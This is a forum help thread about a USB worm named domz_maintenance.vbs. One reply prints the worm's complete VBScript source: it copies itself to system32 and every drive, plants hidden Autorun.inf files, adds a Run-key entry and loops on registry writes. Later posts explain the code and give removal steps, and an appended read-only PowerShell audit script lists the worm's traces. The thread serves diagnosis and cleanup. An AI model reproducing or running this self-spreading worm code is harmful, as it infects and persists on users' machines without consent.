  1. #1

    Help domz_maintenance.vbs

    Guys, please help.....

    I bought a new USB device, a nice camera keychain,
    but it seems to have a virus or spamming program on it, and I even opened it; my McAfee didn't detect it

    it contains 2 files
    Autorun.inf
    domz_maintenance.vbs

    result: all of my drives now have the same files, plus a message file,
    domz_info.txt; here are its contents
    "!!!!!!!!!!THIS PROGRAM WAS CREATED BY DOMZ!!!!!!
    Most of the virus can penetrate and damage your computer system!!!!!!
    It can damage the registry and disable some components of the operating system
    This program protects your computer and repair the damages caused by a virus.
    It always enable the important components of your computer system such as:
    Folder Options
    Task Manager
    Registry Editor
    Command Prompt
    Control Panel
    Viewing all Drives
    Enable Add Printer
    Run in Start Menu
    Network Connections
    Log Off
    Displaying Desktop

    " It says "repair", but so many of its files are scattered across my drives

    anyway, I managed to stop it from spreading to my drives,
    but I don't know what else was affected or whether it left behind a program or keylogger ...

    I checked its code; I converted it to a text file so it wouldn't spread. Maybe someone here can read the script so I can find out the extent of the damage. Please help
    thanks

    I'm attaching the code for anyone who can read it

  2. #2

    Thumbsup Re: domz_maintenance.vbs

    sir, try Avast hehe, my Avast detected it
    also try to taskkill wscript in cmd
    taskkill /f /im wscript.exe /t
    Last edited by vanz1402; 22nd Jul 2012 at 10:27.

  3. #3

    Default Re: domz_maintenance.vbs

    use Malwarebytes, TS, it detects that virus 100%

  4. #4

    Thumbsup Re: domz_maintenance.vbs

    So this is VBScript. It's just a bit messy because there's a lot of garbage. Anyway, I cleaned it up by removing the comment lines and empty newlines using some search-and-replace algorithm.

    Removing comments


    Removing empty lines


    And here are the results. Just follow it so you can clean your PC. Assuming you know this.
    Code:
    Option Explicit
    
    Dim Wshshell, objfile, gtfile,con,autoda
    Dim dopen, dopens,cln
    
    Dim src, cpytxt, getfnm, getfn2
    
    Dim num, num1, pathfile,cpytext,mydrive,drv,pat2 
    Dim fileattrib, aut
    
    Dim drv1,cpyfile2,cpyfile3,cpyfile4,cpyfile5
    
    Dim getfnC,getfnt,getfnj,x,cl,pat1,autoattrib,autodomz 
    
    Dim ddd,autod,datef,autox,deld,dddd,autoh
    
    const fghr = "\do"
    
    const fghh = "mz"
    
    const hgjtr = "_main" 
    
    const hgttt = "tenance"
    
    const ext = ".vbs"
    
    Set Wshshell = Wscript.CreateObject("Wscript.Shell")
    Set objfile = Wscript.Createobject("Scripting.FileSystemObject")
    pathfile = Wscript.Scriptfullname
     
    
    set gtfile = objfile.getfile(pathfile).OpenastextStream(1)
    do until gtfile.atendofstream 
    src = src & gtfile.readline & vbcrlf
    loop 
    
    set cpytxt = objfile.createtextfile("C:\windows\system32\domz.vbs",true)
    cpytxt.writeline src 
    cpytxt.close
    
    cl = objfile.getdrivename(Wscript.ScriptFullname)
    
    set cln = objfile.getdrive(cl)
    
    select case cln.DriveType
    
    case 1:wshshell.run "Explorer" & " " & cl,3,false
    
    case 2: wshshell.run "Explorer" & " " & cl,0,false
    
     end select
    
    While (true) 
    con = objfile.FileExists("C:\windows\system32\domz.vbs") 
    on error resume next
    if con = false then
    set cpytext = objfile.createtextfile("C:\windows\system32\domz.vbs",true)
    cpytext.writeline src 
    
    cpytext.close
    
    end if
    
    on error goto 0
    set mydrive = objfile.drives 
    for each drv in mydrive
    if drv.isready then
    
    if (drv.driveletter <> "A:" and drv.drivetype = 2) then 
    err.clear
    
    on error resume next 
    
    set getfn = objfile.getfile(drv.path & fghr & fghh & hgjtr & hgttt & ext)
    
    num = err.number
    
    on error goto 0
    
    if num <> 0 then 
    
    err.clear
    
    on error resume next
    
    set cpyfile2 = objfile.createtextfile(drv.path & fghr & fghh & hgjtr & hgttt & ext,true)
    
    cpyfile2.writeline src
    
    cpyfile2.close 
    
    set cpyfile3 = objfile.createtextfile(drv.path & "\domz_info.txt", true)
    cpyfile3.write "!!!!!!!!!!THIS PROGRAM WAS CREATED BY DOMZ!!!!!!" & vbcrlf'
    cpyfile3.write "Most of the virus can penetrate and damage your computer system!!!!!!" & vbcrlf
    
    cpyfile3.write "It can damage the registry and disable some components of the operating system" & vbcrlf
    cpyfile3.write "This program protects your computer and repair the damages caused by a virus." & vbcrlf
    
    cpyfile3.write "It always enable the important components of your computer system such as:" & vbcrlf
    
    cpyfile3.write "Folder Options" &vbcrlf
    
    cpyfile3.write "Task Manager" & vbcrlf
    
    cpyfile3.write "Registry Editor" & vbcrlf
    
    cpyfile3.write "Command Prompt" & vbcrlf
    
    cpyfile3.write "Control Panel" & vbcrlf
    
    cpyfile3.write "Viewing all Drives" & vbcrlf
    cpyfile3.write "Enable Add Printer" & vbcrlf
    cpyfile3.write "Run in Start Menu" & vbcrlf
    
    cpyfile3.write "Network Connections" & vbcrlf
    cpyfile3.write "Log Off" & vbcrlf
    
    cpyfile3.write "Displaying Desktop" & vbcrlf
    cpyfile3.close
    
    on error goto 0
    
    end if
    End if
    if (drv.driveletter <> "A:" and drv.drivetype = 1) then 
    
    err.clear
    on error resume next 
    set getfn2 = objfile.GetFile(drv.path & "\Autorun.inf")
    num1 = err.number
    
    on error goto 0
    if num1 <> 0 then
    
    err.clear
    on error resume next
    
    set aut = objfile.createtextfile(drv.path &"\Autorun.inf",true)
    
    aut.writeline("[Autorun]")
    
    aut.writeline("open=wscript.exe domz_maintenance.vbs")
    
    aut.writeline("shell\Open\Command=wscript.exe domz_maintenance.vbs")
    
    aut.writeline("shell\Open\Default=1")
    
    aut.writeline("shell\AutoPlay\Command=wscript.exe domz_maintenance.vbs")
    
    aut.writeline("shell\Explore\Command=wscript.exe domz_maintenance.vbs")
    aut.close
    
    set autoattrib = objfile.getfile(drv.path &"\Autorun.inf") 
    autoattrib.attributes = 2
    
    on error goto 0 
    else 
    
    err.clear
    on error resume next
    
    objfile.deletefile drv.path & "\autorun.inf",true
    set aut = objfile.createtextfile(drv.path &"\Autorun.inf",true) 
    aut.writeline("[Autorun]")
    
    aut.writeline("open=wscript.exe domz_maintenance.vbs")
    
    aut.writeline("shell\Open\Command=wscript.exe domz_maintenance.vbs")
    
    aut.writeline("shell\Open\Default=1")
    
    aut.writeline("shell\AutoPlay\Command=wscript.exe domz_maintenance.vbs")
    
    aut.writeline("shell\Explore\Command=wscript.exe domz_maintenance.vbs")
    
    aut.close
    
    set autoattrib = objfile.getfile(drv.path &"\Autorun.inf") 
    autoattrib.attributes = 2
    
    on error goto 0
    End if
    
    err.clear 
    
    on error resume next
    set getfn = objfile.getfile(drv.path & fghr & fghh & hgjtr & hgttt & ext) 
    num = err.number
    on error goto 0
    if num <> 0 then 
     
     
    
    err.clear
    on error resume next
    
    set cpyfile2 = objfile.CreateTextFile(drv.path & fghr & fghh & hgjtr & hgttt & ext,true)
    cpyfile2.writeline src
    cpyfile2.close
    
    set autodomz = objfile.getfile(drv.path & fghr & fghh & hgjtr & hgttt & ext)
    autodomz.attributes = 2
    
    on error goto 0 
    
    end if
    
    End if
    
    End if
    next
    
    on error resume next
    
    with wshshell
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\domz","Wscript.exe" & " "& "c:\windows\system32\domz.vbs","REG_SZ"
    
    .regwrite "HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD",0,"REG_DWORD" 
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoAddPrinter",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogoff",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetworkConnections",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutorun",255,"REG_DWORD"
    
    End with
    
    on error goto 0
    
    wscript.Sleep 5000
    Wend

  5. #5

    Default Re: domz_maintenance.vbs

    thanks for the feedback
    @Asaman83687 I stopped the spread of its files because I deleted this "C:\windows\system32\domz.vbs". What about my registry, what effect would that have?
    thanks for converting the code to make it easier to read

    thank you very much

  6. #6

    Thumbsup Re: domz_maintenance.vbs

    Actually, aside from the part where it scatters files on your disk and sets its program to autorun on start-up, it was honest when it said


    "!!!!!!!!!!THIS PROGRAM WAS CREATED BY DOMZ!!!!!!
    Most of the virus can penetrate and damage your computer system!!!!!!
    It can damage the registry and disable some components of the operating system
    This program protects your computer and repair the damages caused by a virus.
    It always enable the important components of your computer system such as:
    Folder Options
    Task Manager
    Registry Editor
    Command Prompt
    Control Panel
    Viewing all Drives
    Enable Add Printer
    Run in Start Menu
    Network Connections
    Log Off
    Displaying Desktop


    why? because of the part like (at the very bottom of the source)

    Code:
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",0,"REG_DWORD"
    means:
    DisableTaskMgr, 0 ---> Enable Task Manager
    NoRun, 0 --> Enable Opening files thru IE or Windows Explorer
    NoFolderOptions, 0 --> Enable Folder Options

    and many more....

    so what I'd suggest is to just delete the .vbs and the registry keys in the part of

    Code:
    "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\domz","Wscript.exe" & " "& "c:\windows\system32\domz.vbs"

  7. #7

    Default Re: domz_maintenance.vbs

    @Asaman83687 thank you very much for the info

  8. #8

    Default Re: domz_maintenance.vbs

    sir, could this script be adapted for PC restrictions only,
    so that it disables right click and makes the computer drives hidden or inaccessible,
    the kind where nobody can get into the contents of your PC apart from the files on the desktop and the shortcuts.

    I saw something like this in other shops.. their files are safe, and not prone to clueless customers who like to meddle.

    thanks to anyone who can help!!

  9. #9

    Default Re: domz_maintenance.vbs

    huhu where did this come from, even my laptop got hit, my AVG can't detect it, I keep deleting it and it keeps coming back, a tutorial please, can ESET handle this?

  10. #10

    Default Re: domz_maintenance.vbs

    this is my problem too, my AVG doesn't detect it either. what now?
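
A read-only audit for the artifacts named in the script posted in #4 and the cleanup suggested in #6, as an added example that is not part of the original thread. The file names, the Run value and the paths are taken from that script; the helper `Add-Finding` and the output layout are assumptions made for illustration.

```powershell
# Read-only audit: lists the artifacts the posted script creates.
# Nothing is deleted or modified; review the output before cleaning up.
$findings = New-Object System.Collections.Generic.List[object]

# Hypothetical helper (not from the thread): records one finding.
function Add-Finding([string]$Kind, [string]$Where, [string]$Detail) {
    $findings.Add([pscustomobject]@{ Kind = $Kind; Where = $Where; Detail = $Detail })
}

# 1. Running script-host processes whose command line references the script.
Get-CimInstance Win32_Process -Filter "Name='wscript.exe'" |
    Where-Object { $_.CommandLine -match 'domz' } |
    ForEach-Object { Add-Finding 'Process' "PID $($_.ProcessId)" $_.CommandLine }

# 2. The persistence value written under the per-user Run key.
$runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$run = Get-ItemProperty -Path $runKey -Name 'domz' -ErrorAction SilentlyContinue
if ($run) { Add-Finding 'RunValue' $runKey $run.domz }

# 3. The copy that the Run value launches at logon.
$copy = 'C:\windows\system32\domz.vbs'
if (Test-Path -LiteralPath $copy) { Add-Finding 'File' $copy 'copy launched by the Run value' }

# 4. Files dropped in the root of each drive (-Force includes hidden files).
foreach ($drive in Get-PSDrive -PSProvider FileSystem) {
    foreach ($name in 'domz_maintenance.vbs', 'domz_info.txt') {
        $path = Join-Path $drive.Root $name
        $item = Get-Item -LiteralPath $path -Force -ErrorAction SilentlyContinue
        if ($item) { Add-Finding 'File' $item.FullName "attributes: $($item.Attributes)" }
    }
    # Report only Autorun.inf lines that point at the script.
    $inf = Join-Path $drive.Root 'Autorun.inf'
    $infItem = Get-Item -LiteralPath $inf -Force -ErrorAction SilentlyContinue
    if ($infItem) {
        Get-Content -LiteralPath $inf -Force -ErrorAction SilentlyContinue |
            Where-Object { $_ -match 'domz_maintenance\.vbs' } |
            ForEach-Object { Add-Finding 'Autorun' $inf $_.Trim() }
    }
}

if ($findings.Count -eq 0) { 'No domz artifacts found.' }
else { $findings | Format-Table -AutoSize -Wrap }
```

The posted script loops every 5 seconds and rewrites its files and the Run value, so any `wscript.exe` process reported under step 1 has to be stopped before the other findings are removed, otherwise they come back.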
